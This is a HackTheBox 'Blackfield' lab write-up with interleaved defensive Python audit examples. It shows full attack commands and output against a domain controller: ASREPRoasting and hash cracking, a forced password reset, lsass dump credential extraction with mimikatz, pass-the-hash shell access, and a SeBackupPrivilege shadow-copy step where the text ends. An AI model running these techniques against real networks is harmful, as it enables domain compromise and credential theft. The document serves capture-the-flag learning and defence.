xchg2pwn


Reversing and exploit development enthusiast



HackTheBox

Blackfield



Enumeration


We start by scanning the machine's ports with nmap and find several open ports. Against Windows hosts it is advisable to use the -Pn flag, which forces the scan even when the host does not answer ping probes.

❯ nmap 10.10.10.192 -Pn
Nmap scan report for 10.10.10.192
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman

With crackmapexec we can get information about the machine, such as the domain, blackfield.local, and the hostname, which appears to be DC01.

❯ crackmapexec smb 10.10.10.192
SMB         10.10.10.192     445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  

For possible later attacks, or simply for convenience, we add the domain to /etc/hosts, together with the machine name (the DC) as a second hostname.

❯ echo "10.10.10.192 blackfield.local dc01.blackfield.local" | sudo tee -a /etc/hosts  

Enumerating the SMB shares as the user null with an empty password, we see that we have read permission on the profiles$ share.

❯ crackmapexec smb blackfield.local -u null -p '' --shares
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\null: 
SMB         blackfield.local 445    DC01             [+] Enumerated shares
SMB         blackfield.local 445    DC01             Share           Permissions     Remark
SMB         blackfield.local 445    DC01             -----           -----------     ------
SMB         blackfield.local 445    DC01             ADMIN$                          Remote Admin
SMB         blackfield.local 445    DC01             C$                              Default share
SMB         blackfield.local 445    DC01             forensic                        Forensic / Audit share.
SMB         blackfield.local 445    DC01             IPC$            READ            Remote IPC
SMB         blackfield.local 445    DC01             NETLOGON                        Logon server share 
SMB         blackfield.local 445    DC01             profiles$       READ            
SMB         blackfield.local 445    DC01             SYSVOL                          Logon server share

Connecting to the profiles$ share with smbclient as null with no password, we find folders named after possible users.

❯ impacket-smbclient blackfield.local/null@dc01.blackfield.local -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use profiles$
# ls
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 .
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 ..
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AAlleni
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABarteski
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABekesz
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABenzies
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABiemiller
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AChampken
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ACheretei
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ACsonaki
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AHigchens
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AJaquemai
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AKlado
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AKoffenburger
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AKollolli
.............................................................

We create a file named users.txt with the folder names and use kerbrute to enumerate the valid users in the domain; we find 3 valid ones.

❯ kerbrute userenum -d blackfield.local --dc dc01.blackfield.local users.txt  
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/ 

>  Using KDC(s):
>  	dc01.blackfield.local:88

>  [+] VALID USERNAME:	 audit2020@blackfield.local
>  [+] VALID USERNAME:	 support@blackfield.local
>  [+] VALID USERNAME:	 svc_backup@blackfield.local
>  Done! Tested 314 usernames (3 valid) in 69.595 seconds


Access - support


Our user list shrinks to just 3. Trying an ASREPRoast attack with these users, the support user turns out to be vulnerable and returns its hash.

❯ impacket-GetNPUsers blackfield.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:31cc48516cee02ea98a1780c9bf418d2$d70ab79d141aa18456ad2583b8543b59101746b09d24b880912a5b7d77826c52191f18e4da324f9aaeac6844354f0bf0a742ebcece882906df64969eb81ad99e45e081f8139d66e106cfe39d98fe2dfe50661306236747e68405d3dc89a4f2ff325de3aa135208a92cbb998362c8f0eb8acd4b14a09cd0dcab789ec5971eca7656a05b8f6727dc42a7ddaa172a629a2de268ace291a795d72c4bdec0cb796a01a101f45c8379094e21af188fa526d35481df3e4e11564cbd0c9b8afe4428bb99e73c3f8b39dc7799386032a7584a06afff1f6eedc97eb035fc2605e70e76f67f07c7cc5b57182254e5f4578b2c79c2b370634493  
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

With john we can crack this hash and obtain the support user's password.

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
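From the defender's side, the condition behind this hash is an account with the UF_DONT_REQUIRE_PREAUTH bit (0x400000) set in userAccountControl, which is exactly what GetNPUsers tests for. The following added example (not part of the original writeup) shows how to audit a list of accounts for that bit and how to split an AS-REP hash line into its fields; the userAccountControl values and the short hash line are constructed for the example.

```python
import re

# userAccountControl bits (Microsoft ADS_USER_FLAG values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# hashcat/john AS-REP format: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<encrypted part>
_ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<enc>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line):
    """Split an AS-REP hash line into its fields; returns None if it does not match."""
    m = _ASREP_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype"))
    return {
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum": m.group("checksum").lower(),
        "enc_len": len(m.group("enc")) // 2,  # bytes of encrypted data
        # etype 23 is RC4-HMAC: the key is the NT hash itself, the cheapest to crack offline
        "rc4": etype == 23,
    }


def accounts_without_preauth(entries):
    """
    entries: iterable of (sAMAccountName, userAccountControl) pairs, as returned
    by an LDAP query of the domain. Returns the enabled accounts that do not
    require Kerberos pre-authentication, sorted by name.
    """
    found = []
    for name, uac in entries:
        if uac & UF_ACCOUNTDISABLE:
            continue  # a disabled account cannot obtain an AS-REP
        if uac & UF_DONT_REQUIRE_PREAUTH:
            found.append(name)
    return sorted(found)


# Constructed sample: the three names from the kerbrute result with made-up UAC
# values; only 'support' has pre-auth disabled, 'olduser' has it but is disabled.
SAMPLE_ENTRIES = [
    ("audit2020", 0x200),                             # NORMAL_ACCOUNT
    ("support", 0x200 | UF_DONT_REQUIRE_PREAUTH),
    ("svc_backup", 0x10200),                          # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("olduser", 0x202 | UF_DONT_REQUIRE_PREAUTH),     # disabled: not reported
]

if __name__ == "__main__":
    print(accounts_without_preauth(SAMPLE_ENTRIES))
    print(parse_asrep_hash("$krb5asrep$23$support@BLACKFIELD.LOCAL:"
                           "31cc48516cee02ea98a1780c9bf418d2$d70ab79d"))
```

In a real audit the (name, userAccountControl) pairs come from an LDAP search such as `(userAccountControl:1.2.840.113556.1.4.803:=4194304)`; the fix is to clear the flag on every account that does not have a documented reason for it.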

We verify the credentials with crackmapexec and they are valid; however, they do not actually give us any new privileges over the SMB shares.

❯ crackmapexec smb blackfield.local -u support -p '#00^BlackKnight'
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 

❯ crackmapexec smb blackfield.local -u support -p '#00^BlackKnight' --shares
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         blackfield.local 445    DC01             [+] Enumerated shares
SMB         blackfield.local 445    DC01             Share           Permissions     Remark
SMB         blackfield.local 445    DC01             -----           -----------     ------
SMB         blackfield.local 445    DC01             ADMIN$                          Remote Admin
SMB         blackfield.local 445    DC01             C$                              Default share
SMB         blackfield.local 445    DC01             forensic                        Forensic / Audit share.
SMB         blackfield.local 445    DC01             IPC$            READ            Remote IPC
SMB         blackfield.local 445    DC01             NETLOGON        READ            Logon server share 
SMB         blackfield.local 445    DC01             profiles$       READ            
SMB         blackfield.local 445    DC01             SYSVOL          READ            Logon server share


Access - audit2020


We can use BloodHound to collect all the domain information; for this we use the support user's credentials and produce a zip file with the data.

❯ bloodhound-python -u support -p '#00^BlackKnight' -c All -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip  
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 34S
INFO: Compressing output into 20230625195626_bloodhound.zip

We upload the zip and, among the object controls the support user has, we find the ForceChangePassword privilege over the audit2020 user.

This privilege lets us change a user's password, so using net over RPC we change audit2020's password to a new one.

❯ net rpc password audit2020 -U 'blackfield.local/support%#00^BlackKnight' -S dc01.blackfield.local  
Enter new password for audit2020: password123#

Now we can verify with crackmapexec that the password has been changed.

❯ crackmapexec smb blackfield.local -u audit2020 -p password123#
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\audit2020:password123#
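The ForceChangePassword edge BloodHound draws corresponds to an ACE on the target user granting the User-Force-Change-Password extended right (GUID 00299570-246d-11d0-a768-00aa006e0529), or a broader right such as GenericAll or WriteDacl that implies it. The added example below (not part of the original writeup) audits a list of simplified ACEs for that condition; the ACE records and the list of expected trustees are constructed for the example.

```python
# Extended right "User-Force-Change-Password": reset a password without knowing the old one
USER_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"
# Extended right "User-Change-Password": change your own password knowing the old one (benign)
USER_CHANGE_PASSWORD = "ab721a53-1e2f-11d0-9819-00aa0040529b"

# Access-mask bits (ADS_RIGHTS_ENUM) that matter here
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100   # extended rights, scoped by object_type GUID
ADS_RIGHT_WRITE_DAC = 0x00040000           # can grant itself any right -> equivalent
ADS_RIGHT_WRITE_OWNER = 0x00080000
ADS_RIGHT_GENERIC_ALL = 0x10000000

# Constructed list of principals expected to hold this right over ordinary users
EXPECTED_TRUSTEES = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
    "BLACKFIELD\\Domain Admins",
    "BLACKFIELD\\Account Operators",
}


def grants_force_change_password(ace):
    """True if an access-allowed ACE lets the trustee reset the target's password."""
    if ace["type"] != "allow":
        return False
    mask = ace["mask"]
    if mask & (ADS_RIGHT_GENERIC_ALL | ADS_RIGHT_WRITE_DAC | ADS_RIGHT_WRITE_OWNER):
        return True
    if mask & ADS_RIGHT_DS_CONTROL_ACCESS:
        # An empty object_type means "all extended rights"; otherwise it must name this one.
        return ace.get("object_type", "") in ("", USER_FORCE_CHANGE_PASSWORD)
    return False


def suspicious_password_reset_rights(acl_entries, expected=EXPECTED_TRUSTEES):
    """Return sorted (trustee, target) pairs where a trustee outside 'expected' can reset the target."""
    hits = set()
    for ace in acl_entries:
        if grants_force_change_password(ace) and ace["trustee"] not in expected:
            hits.add((ace["trustee"], ace["target"]))
    return sorted(hits)


# Constructed ACEs as an ACL export might list them (trustee, target, type, mask, object_type)
SAMPLE_ACL = [
    {"trustee": "BLACKFIELD\\Domain Admins", "target": "audit2020", "type": "allow",
     "mask": ADS_RIGHT_GENERIC_ALL, "object_type": ""},
    {"trustee": "NT AUTHORITY\\SELF", "target": "audit2020", "type": "allow",
     "mask": ADS_RIGHT_DS_CONTROL_ACCESS, "object_type": USER_CHANGE_PASSWORD},
    {"trustee": "BLACKFIELD\\support", "target": "audit2020", "type": "allow",
     "mask": ADS_RIGHT_DS_CONTROL_ACCESS, "object_type": USER_FORCE_CHANGE_PASSWORD},
    {"trustee": "BLACKFIELD\\support", "target": "svc_backup", "type": "deny",
     "mask": ADS_RIGHT_DS_CONTROL_ACCESS, "object_type": USER_FORCE_CHANGE_PASSWORD},
    {"trustee": "BLACKFIELD\\helpdesk", "target": "svc_backup", "type": "allow",
     "mask": 0x20, "object_type": ""},   # write property only: no reset
]

if __name__ == "__main__":
    for trustee, target in suspicious_password_reset_rights(SAMPLE_ACL):
        print("%s can reset the password of %s" % (trustee, target))
```

Besides removing the stray ACE, the event to watch for afterwards is 4724 ("An attempt was made to reset an account's password") where the subject is not one of the expected trustees.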


Shell - svc_backup


Listing the shares as the audit2020 user we now have new privileges, such as read access to the forensic share, which we did not have before.

❯ crackmapexec smb blackfield.local -u audit2020 -p password123# --shares
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\audit2020:password123# 
SMB         blackfield.local 445    DC01             [+] Enumerated shares
SMB         blackfield.local 445    DC01             Share           Permissions     Remark
SMB         blackfield.local 445    DC01             -----           -----------     ------
SMB         blackfield.local 445    DC01             ADMIN$                          Remote Admin
SMB         blackfield.local 445    DC01             C$                              Default share
SMB         blackfield.local 445    DC01             forensic        READ            Forensic / Audit share.
SMB         blackfield.local 445    DC01             IPC$            READ            Remote IPC
SMB         blackfield.local 445    DC01             NETLOGON        READ            Logon server share 
SMB         blackfield.local 445    DC01             profiles$       READ            
SMB         blackfield.local 445    DC01             SYSVOL          READ            Logon server share

We connect with smbclient using audit2020's credentials; in the forensic share we find 3 directories, each with files inside.

❯ impacket-smbclient blackfield.local/audit2020:password123#@dc01.blackfield.local  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use forensic
# ls
drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 .
drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 ..
drw-rw-rw-          0  Sun Feb 23 13:14:37 2020 commands_output
drw-rw-rw-          0  Thu May 28 16:29:24 2020 memory_analysis
drw-rw-rw-          0  Fri Feb 28 17:30:34 2020 tools
#

To make analysis easier we mount the whole forensic share under /mnt, providing audit2020's credentials.

❯ sudo mount -t cifs //blackfield.local/forensic /mnt -o username=audit2020,password=password123#,domain=blackfield.local  

In /mnt we can list all the files in the forensic share: we find txt files, zip files and some folders with different tools.

/mnt ❯ ls -l *

commands_output:
.rwxr-xr-x root root 528 B  Sun Feb 23 08:00:19 2020  domain_admins.txt
.rwxr-xr-x root root 962 B  Sun Feb 23 07:51:52 2020  domain_groups.txt
.rwxr-xr-x root root  16 KB Fri Feb 28 17:32:17 2020  domain_users.txt
.rwxr-xr-x root root 506 KB Sun Feb 23 07:53:58 2020  firewall_rules.txt  
.rwxr-xr-x root root 1.7 KB Sun Feb 23 07:50:28 2020  ipconfig.txt
.rwxr-xr-x root root 3.8 KB Sun Feb 23 07:51:01 2020  netstat.txt
.rwxr-xr-x root root 3.9 KB Sun Feb 23 07:53:01 2020  route.txt
.rwxr-xr-x root root 4.4 KB Sun Feb 23 07:56:59 2020  systeminfo.txt
.rwxr-xr-x root root 9.8 KB Sun Feb 23 07:54:29 2020  tasklist.txt

memory_analysis:
.rwxr-xr-x root root  36 MB Thu May 28 16:25:36 2020  conhost.zip
.rwxr-xr-x root root  24 MB Thu May 28 16:25:45 2020  ctfmon.zip
.rwxr-xr-x root root  23 MB Thu May 28 16:25:54 2020  dfsrs.zip
.rwxr-xr-x root root  18 MB Thu May 28 16:26:04 2020  dllhost.zip
.rwxr-xr-x root root 8.4 MB Thu May 28 16:26:13 2020  ismserv.zip
.rwxr-xr-x root root  40 MB Thu May 28 16:25:08 2020  lsass.zip
.rwxr-xr-x root root  61 MB Thu May 28 16:25:25 2020  mmc.zip
.rwxr-xr-x root root  13 MB Thu May 28 16:26:24 2020  RuntimeBroker.zip
.rwxr-xr-x root root 126 MB Thu May 28 16:26:49 2020  ServerManager.zip
.rwxr-xr-x root root  32 MB Thu May 28 16:27:00 2020  sihost.zip
.rwxr-xr-x root root  32 MB Thu May 28 16:27:11 2020  smartscreen.zip
.rwxr-xr-x root root  14 MB Thu May 28 16:27:19 2020  svchost.zip
.rwxr-xr-x root root  33 MB Thu May 28 16:27:30 2020  taskhostw.zip
.rwxr-xr-x root root  14 MB Thu May 28 16:27:38 2020  winlogon.zip
.rwxr-xr-x root root 3.9 MB Thu May 28 16:27:44 2020  wlms.zip
.rwxr-xr-x root root  18 MB Thu May 28 16:27:53 2020  WmiPrvSE.zip

tools:
drwxr-xr-x root root 0 B Sun Feb 23 08:39:03 2020  sleuthkit-4.8.0-win32  
drwxr-xr-x root root 0 B Sun Feb 23 08:35:25 2020  sysinternals
drwxr-xr-x root root 0 B Sun Feb 23 08:35:39 2020  volatility

The txt files inside commands_output are the output of various commands; for example, domain_admins.txt is the output of net group 'Domain Admins'.

/mnt/commands_output ❯ cat domain_admins.txt 
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

--------------------------------------------------------------------------  
Administrator       Ipwn3dYourCompany     
The command completed successfully.

Of the zip files inside memory_analysis, lsass.zip looks interesting; we can copy it from the mount or connect with smbclient and download it.

/mnt/memory_analysis ❯ cp lsass.zip /home/kali  

❯ impacket-smbclient blackfield.local/audit2020:password123#@dc01.blackfield.local  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use forensic
# cd memory_analysis
# get lsass.zip
#

This zip contains a file named lsass.DMP, which is a minidump of lsass.

❯ unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP  
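A process dump of lsass left on a share readable by low-privileged users is the real finding here. Every minidump starts with a fixed 32-byte MINIDUMP_HEADER (signature "MDMP", a version field whose low word is 0xA793, the stream count and the stream directory offset), so a share sweep can recognise such files by content rather than by name. The following added example (not part of the original writeup) parses that header and flags files worth quarantining; the listing and the header bytes are constructed for the example.

```python
import re
import struct

MINIDUMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793  # low 16 bits of the Version field
# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
#                  CheckSum, TimeDateStamp, Flags (ULONG64)
_HEADER = struct.Struct("<4sIIIIIQ")

# Filenames that should never sit on a share readable by ordinary users
SENSITIVE_NAMES = re.compile(r"(lsass|ntds\.dit|\bsam\b|\bsystem\b|\bsecurity\b|\.dmp$)", re.I)


def parse_minidump_header(data):
    """Return the header fields of a minidump, or None if 'data' is not one."""
    if len(data) < _HEADER.size:
        return None
    sig, version, nstreams, dir_rva, checksum, ts, flags = _HEADER.unpack_from(data)
    if sig != MINIDUMP_SIGNATURE or (version & 0xFFFF) != MINIDUMP_VERSION:
        return None
    return {"streams": nstreams, "directory_rva": dir_rva, "timestamp": ts, "flags": flags}


def flag_sensitive_files(listing):
    """
    listing: iterable of (path, first_bytes) pairs from a share walk.
    Returns [(path, reason)] for files that hold or may hold credential material.
    """
    hits = []
    for path, head in listing:
        name = path.rsplit("/", 1)[-1]
        hdr = parse_minidump_header(head)
        if hdr is not None:
            hits.append((path, "minidump (%d streams)" % hdr["streams"]))
        elif SENSITIVE_NAMES.search(name):
            hits.append((path, "sensitive filename"))
    return hits


# Constructed header: 13 streams, directory right after the header, no flags
FAKE_MINIDUMP_HEADER = _HEADER.pack(b"MDMP", 0xA793, 13, _HEADER.size, 0, 1582466403, 0)

# Constructed share walk modelled on the forensic share layout above
SAMPLE_LISTING = [
    ("forensic/commands_output/systeminfo.txt", b"Host Name: DC01"),
    ("forensic/memory_analysis/lsass.zip", b"PK\x03\x04" + b"\0" * 28),
    ("forensic/memory_analysis/extracted/lsass.DMP", FAKE_MINIDUMP_HEADER),
    ("forensic/tools/volatility/README.txt", b"Volatility Framework"),
    ("backup/SYSTEM", b"regf" + b"\0" * 28),
]

if __name__ == "__main__":
    for path, reason in flag_sensitive_files(SAMPLE_LISTING):
        print("%-45s %s" % (path, reason))
```

Note that the name filter deliberately uses word boundaries, so systeminfo.txt is not reported while a bare SYSTEM hive is; the zip is caught by name only, since its content has to be extracted before the header check applies.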

We can use mimikatz on Windows to dump the logonPasswords from the minidump.

When dumping the logon sessions we find several credentials, among them those of svc_backup; this session shows us its NTLM hash in the domain.

mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.DMP' file for minidump...

Authentication Id : 0 ; 406458 (00000000:000633ba)
Session           : Interactive from 2
User Name         : svc_backup
Domain            : BLACKFIELD
Logon Server      : DC01
Logon Time        : 23/02/2020 12:00:03 p. m.
SID               : S-1-5-21-4194615774-2175524697-3563712290-1413
        msv :
         [00000003] Primary
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * NTLM     : 9658d1d1dcd9250115e2205d9f48400d
         * SHA1     : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
         * DPAPI    : a03cd8e9d30171f3cfe8caad92fef621
        tspkg :
        wdigest :
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * Password : (null)
        kerberos :
         * Username : svc_backup
         * Domain   : BLACKFIELD.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 365835 (00000000:0005950b)
.................................................................  

If we want to do it from Linux we can use pypykatz, passing it the minidump file; it extracts the logon sessions and the NTLM hash in the same way.

❯ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 365835 (5950b)
...............................................................  

Checking svc_backup's NT hash with crackmapexec we can see it is valid at domain level, both over SMB and over WinRM.

❯ crackmapexec smb blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d

❯ crackmapexec winrm blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB         blackfield.local 5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        blackfield.local 5985   DC01             [*] http://blackfield.local:5985/wsman
WINRM       blackfield.local 5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)

Since it is valid for WinRM we can connect with evil-winrm using pass-the-hash; we get a shell as svc_backup and can read the flag.

❯ evil-winrm -i blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d  
PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
392**************************543
PS C:\Users\svc_backup\Documents>


Shell - Administrator


Looking at the svc_backup user's privileges we find SeBackupPrivilege; exploiting this privilege is exactly the same as in the XEN endgame.

PS C:\Users\svc_backup\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======  
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

PS C:\Users\svc_backup\Documents>
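When triaging a compromised account it helps to turn this whoami /priv table into a list of privileges that are equivalent to local administrator. The following added example (not part of the original writeup) parses the output above and reports the high-risk entries; the risk table is the editor's own and the sample text is copied from the session shown.

```python
# Privileges that bypass ACLs or otherwise lead to SYSTEM. SeBackupPrivilege is the one
# used on this box: it reads ntds.dit and SYSTEM straight out of a shadow copy.
HIGH_RISK_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of its ACL (ntds.dit, SAM, SYSTEM)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeDebugPrivilege": "open and read any process, including lsass",
    "SeImpersonatePrivilege": "impersonate the tokens of connecting clients",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_whoami_priv(output):
    """Parse 'whoami /priv' text into {privilege_name: state}, skipping headers and rules."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def high_risk_privileges(privs, enabled_only=False):
    """
    Return {name: (state, why)} for the dangerous privileges present in the token.
    A 'Disabled' privilege is still held and can be enabled by the process itself,
    so by default it is reported too.
    """
    hits = {}
    for name, state in privs.items():
        if name in HIGH_RISK_PRIVILEGES and (state == "Enabled" or not enabled_only):
            hits[name] = (state, HIGH_RISK_PRIVILEGES[name])
    return hits


# Output of 'whoami /priv' for svc_backup as shown in the session above
SAMPLE_WHOAMI = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

if __name__ == "__main__":
    for name, (state, why) in high_risk_privileges(parse_whoami_priv(SAMPLE_WHOAMI)).items():
        print("%-26s %-9s %s" % (name, state, why))
```

For a service account, both SeBackupPrivilege and SeRestorePrivilege come from membership in Backup Operators; removing the account from that group (or giving the backup job a gMSA that is not usable interactively) is the fix, and event 4672 records every logon that receives these privileges.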

We start by creating a txt file with the commands diskshadow will run; in this case we create an alias named xyz for the C: drive and expose it as X:.

❯ cat cmd.txt
set context persistent nowriters 
add volume C: alias xyz 
set metadata C:\ProgramData\xyz.cab 
create 
expose %xyz% X: 

Using evil-winrm's upload function we can upload this txt file.

PS C:\ProgramData> upload cmd.txt

Info: Uploading cmd.txt to C:\ProgramData\cmd.txt  

Data: 160 bytes of 160 bytes copied

Info: Upload successful!

PS C:\ProgramData>

Now we run diskshadow with the /s parameter pointing at the txt file with the commands; executing them creates the shadow copy, which we can access from X:.

PS C:\ProgramData> diskshadow /s cmd.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/25/2023 10:38:14 PM

-> set context persistent nowriters
-> add volume C: alias xyz
-> set metadata C:\ProgramData\xyz.cab
-> create
Alias xyz for shadow ID {51decf05-558f-4eed-8412-a92b47a180e1} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4180af0d-16d3-408f-9ae5-459f2ad86d1a} set as environment variable.  

Querying all shadow copies with the shadow copy set ID {4180af0d-16d3-408f-9ae5-459f2ad86d1a}

	* Shadow copy ID = {51decf05-558f-4eed-8412-a92b47a180e1}		%xyz%
		- Shadow copy set: {4180af0d-16d3-408f-9ae5-459f2ad86d1a}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 6/25/2023 10:38:15 PM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: DC01.BLACKFIELD.local
		- Service machine: DC01.BLACKFIELD.local
		- Not exposed
